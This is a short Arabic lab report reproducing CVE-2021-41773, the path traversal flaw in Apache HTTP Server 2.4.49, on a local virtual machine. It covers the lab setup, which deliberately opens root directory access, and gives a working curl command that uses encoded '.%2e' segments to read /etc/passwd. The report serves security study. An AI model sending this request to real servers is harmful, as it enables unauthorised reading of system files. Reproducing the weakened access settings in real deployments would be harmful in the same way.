تقرير إعادة إنتاج ثغرة CVE-2021-41773
نظرة عامة على الثغرة
- CVE ID: CVE-2021-41773
- اسم الثغرة: ثغرة اجتياز المسار في Apache HTTP Server
- مستوى الخطورة: مرتفع (CVSS 7.5)
- الإصدارات المتأثرة: Apache HTTP Server 2.4.49
- وصف الثغرة: يحتوي الإصدار 2.4.49 من Apache HTTP Server على خلل في تنفيذ دالة تطبيع المسار
ap_normalize_path، ويمكن للمهاجم من خلال إنشاء طلبات خاصة تحتوي على الترميز %2e تجاوز التحكم في الوصول وقراءة أي ملف على خادم الويب.
إعداد البيئة
- نظام التشغيل: Ubuntu 20.04 (آلة افتراضية)
- خادم الويب: Apache httpd 2.4.49 (تثبيت يدوي عبر الترجمة من المصدر)
- بيئة الاختبار: تعمل بشكل مستقل، وتستمع على المنفذ 8080
- الإعدادات الرئيسية:
- تعديل
Require all denied الخاصة بـ <Directory /> إلى Require all granted
- إضافة
Alias /vuln يشير إلى /tmp/vuln_dir مع تعيين الصلاحيات
إعادة إنتاج الثغرة
أمر الهجوم
curl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
لقطة شاشة الهجوم
